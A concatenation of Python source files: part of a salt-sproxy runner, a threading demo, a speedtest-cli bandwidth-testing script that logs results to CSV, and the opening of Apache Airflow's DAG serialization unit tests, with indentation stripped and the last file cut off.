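# The cache key is the SHA1 of '<tgt>_<tgt_type>', with a companion
# '<cache_key>_time' entry recording when the targets were stored, so the
# cached list can be discarded once it is older than target_cache_timeout
# seconds.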
cache_time = cache_bank.fetch('_salt_sproxy_target', cache_time_key)
if cache_time and time.time() - cache_time <= target_cache_timeout:
log.debug('Loading the targets from the cache')
targets = cache_bank.fetch('_salt_sproxy_target', cache_key)
if not targets:
rtargets = {}
if use_existing_proxy:
log.debug('Gathering the cached Grains from the existing Minions')
cached_grains = __salt__['cache.grains'](tgt=tgt, tgt_type=tgt_type)
for target, target_grains in cached_grains.items():
rtargets[target] = {'minion_opts': {'grains': target_grains}}
existing_minions.append(target)
log.debug('Computing the target using the %s Roster', roster)
__opts__['use_cached_grains'] = use_cached_grains
__opts__['use_cached_pillar'] = use_cached_pillar
roster_modules = salt.loader.roster(
__opts__, runner=__salt__, whitelist=[roster]
)
if '.targets' not in roster:
roster = '{mod}.targets'.format(mod=roster)
rtargets_roster = roster_modules[roster](_tgt, tgt_type=_tgt_type)
rtargets = salt.utils.dictupdate.merge(rtargets, rtargets_roster)
targets = list(rtargets.keys())
if target_cache and not (invasive_targeting or preload_targeting):
cache_bank.store('_salt_sproxy_target', cache_key, targets)
cache_bank.store('_salt_sproxy_target', cache_time_key, time.time())
if preload_targeting or invasive_targeting:
log.debug(
'Loaded everything from the Roster, to start collecting Grains and Pillars:'
)
else:
log.debug(
'The target expression "%s" (%s) matched the following:', str(tgt), tgt_type
)
log.debug(targets)
if not targets:
return 'No devices matched your target. Please review your tgt / tgt_type arguments, or the Roster data source'
if preview_target:
return targets
elif not salt_function:
return 'Please specify a Salt function to execute.'
jid = kwargs.get('__pub_jid')
if not jid:
if salt.version.__version_info__ >= (2018, 3, 0):
jid = salt.utils.jid.gen_jid(__opts__)
else:
jid = salt.utils.jid.gen_jid() # pylint: disable=no-value-for-parameter
if verbose or show_jid:
salt.utils.stringutils.print_cli('Executing job with jid {0}'.format(jid))
salt.utils.stringutils.print_cli(
'-------------------------------------------\n'
)
if events:
__salt__['event.send'](jid, {'minions': targets})
return execute_devices(
targets,
salt_function,
tgt=tgt,
tgt_type=tgt_type,
with_grains=with_grains,
preload_grains=preload_grains,
with_pillar=with_pillar,
preload_pillar=preload_pillar,
default_grains=default_grains,
default_pillar=default_pillar,
args=args,
batch_size=batch_size,
batch_wait=batch_wait,
static=static,
events=events,
cache_grains=cache_grains,
cache_pillar=cache_pillar,
use_cached_grains=use_cached_grains,
use_cached_pillar=use_cached_pillar,
use_existing_proxy=use_existing_proxy,
existing_minions=existing_minions,
no_connect=no_connect,
roster_targets=rtargets,
test_ping=test_ping,
preload_targeting=preload_targeting,
invasive_targeting=invasive_targeting,
failhard=failhard,
timeout=timeout,
summary=summary,
verbose=verbose,
progress=progress,
hide_timeout=hide_timeout,
returner=returner,
returner_config=returner_config,
returner_kwargs=returner_kwargs,
**kwargs
)
|
example2.py
|
#!/usr/bin/env python
import threading
import time
def worker():
print('new worker')
time.sleep(0.5)
print('end of worker')
t0 = threading.Thread(target=worker)
t1 = threading.Thread()
t0.daemon = t1.daemon = True
t1.run = worker
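# Note: t0 runs worker() because it was passed as target=; t1 runs worker()
# because its run attribute was replaced directly, so start() invokes the
# overriding function in the new thread instead of Thread's default run().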
print('before')
t0.start()
time.sleep(0.1)
t1.start()
print('after')
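# Both threads are daemon threads, so the interpreter is free to exit right
# after printing 'after'; depending on timing, the workers may be killed
# before they print 'end of worker'.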
|
speedtest.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.3.1'
# Some global variables we use
source = None
shutdown_event = None
import os
import re
import sys
import math
import signal
import socket
import timeit
import threading
from datetime import datetime
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
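# Haversine formula: a = sin^2(dlat/2) + cos(lat1) * cos(lat2) * sin^2(dlon/2),
# c = 2 * atan2(sqrt(a), sqrt(1 - a)), distance = radius * c.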
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1))
* math.cos(math.radians(lat2)) * math.sin(dlon / 2)
* math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
f = urlopen(self.url)
while 1 and not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
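# The bounded queue (maxsize=6) throttles the producer: q.put() blocks once
# six un-consumed FileGetter threads are queued, so the producer stays only
# a few threads ahead of the consumer, limiting concurrent downloads.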
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
f = urlopen(self.url, self.data)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
uh = urlopen('http://www.speedtest.net/speedtest-config.php')
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError:
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
uh = urlopen('http://www.speedtest.net/speedtest-servers-static.php')
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError:
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
print_('Failed to parse list of speedtest.net servers')
sys.exit(1)
servers = {}
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']), float(client['lon'])],
[float(attrib.get('lat')), float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
start = timeit.default_timer()
h.request("GET", urlparts[2])
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
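# cum holds 3 latency samples (or 3600-second penalties on failure);
# dividing by 6 rather than 3 halves the average round-trip time,
# presumably to approximate one-way latency, and * 1000 converts the
# result to milliseconds.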
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
output = "%s" % (datetime.now().strftime('%Y/%m/%d, %H:%M'))
#print output
global shutdown_event, source
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('bytes', 1), default=('bits', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
f = urlopen(args.mini)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
f = urlopen('%s/speedtest/upload.%s' % (args.mini, ext))
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
#Add server details to output
output += ", %s, %s, %.2f, %s" % (best["sponsor"], best["name"], best["d"], best["latency"])
#print output
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
# ADD DOWNLOAD SPEED TO OUTPUT
output += ", %0.2f" % ((dlspeed / 1000 / 1000) * 8)
#print output
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
# ADD UPLOAD SPEED TO OUTPUT
output += ", %0.2f" % ((ulspeed / 1000 / 1000) * 8)
#print output
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
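# Note: the 'hash' parameter above is the MD5 of 'ping-upload-download-<key>',
# presumably used server-side to sanity-check the submitted results.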
req = Request('http://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode())
req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
f = urlopen(req)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: http://www.speedtest.net/result/%s.png' %
resultid[0])
# Append new line to output
output += "\n"
# Append results to results.csv
with open("results.csv", "a") as outputfile:
outputfile.write(output)
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import copy
import importlib
import importlib.util
import multiprocessing
import os
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from airflow.exceptions import SerializationError
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.models.param import Param, ParamsDict
from airflow.models.xcom import XCom
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import CustomSerializationTimetable, cron_timetable, delta_timetable
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_ext": ['.sh', '.bash'],
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_ext": [],
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"schedule_interval": {"__type": "timedelta", "__var": 86400.0},
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
"params": {},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
CUSTOM_TIMETABLE_SERIALIZED = {
"__type": "tests.test_utils.timetables.CustomSerializationTimetable",
"__var": {"value": "foo"},
}
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def get_timetable_based_simple_dag(timetable):
"""Create a simple_dag variant that uses timetable instead of schedule_interval."""
dag = collect_dags(["airflow/example_dags"])["simple_dag"]
dag.timetable = timetable
dag.schedule_interval = timetable.summary
return dag
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
@pytest.fixture()
def timetable_plugin(monkeypatch):
"""Patch plugins manager to always and only return our custom timetable."""
from airflow import plugins_manager
monkeypatch.setattr(plugins_manager, "initialize_timetables_plugins", lambda: None)
monkeypatch.setattr(
plugins_manager,
"timetable_classes",
{"tests.test_utils.timetables.CustomSerializationTimetable": CustomSerializationTimetable},
)
class TestStringifiedDAGs:
"""Unit tests for stringified DAGs."""
def setup_method(self):
self.backup_base_hook_get_connection = BaseHook.get_connection
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def teardown_method(self):
BaseHook.get_connection = self.backup_base_hook_get_connection
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
@pytest.mark.parametrize(
"timetable, serialized_timetable",
[
(
cron_timetable("0 0 * * *"),
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "0 0 * * *", "timezone": "UTC"},
},
),
(
CustomSerializationTimetable("foo"),
CUSTOM_TIMETABLE_SERIALIZED,
),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_serialization_to_timetable(self, timetable, serialized_timetable):
"""Verify a timetable-backed schedule_interval is excluded in serialization."""
dag = get_timetable_based_simple_dag(timetable)
serialized_dag = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(serialized_dag)
expected = copy.deepcopy(serialized_simple_dag_ground_truth)
del expected["dag"]["schedule_interval"]
expected["dag"]["timetable"] = serialized_timetable
self.validate_serialized_dag(serialized_dag, expected)
def test_dag_serialization_unregistered_custom_timetable(self):
"""Verify serialization fails without timetable registration."""
dag = get_timetable_based_simple_dag(CustomSerializationTimetable("bar"))
with pytest.raises(SerializationError) as ctx:
SerializedDAG.to_dict(dag)
message = (
"Failed to serialize DAG 'simple_dag': Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter, but assertEqual would fail if the order of
items changes in the dag dictionary.
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
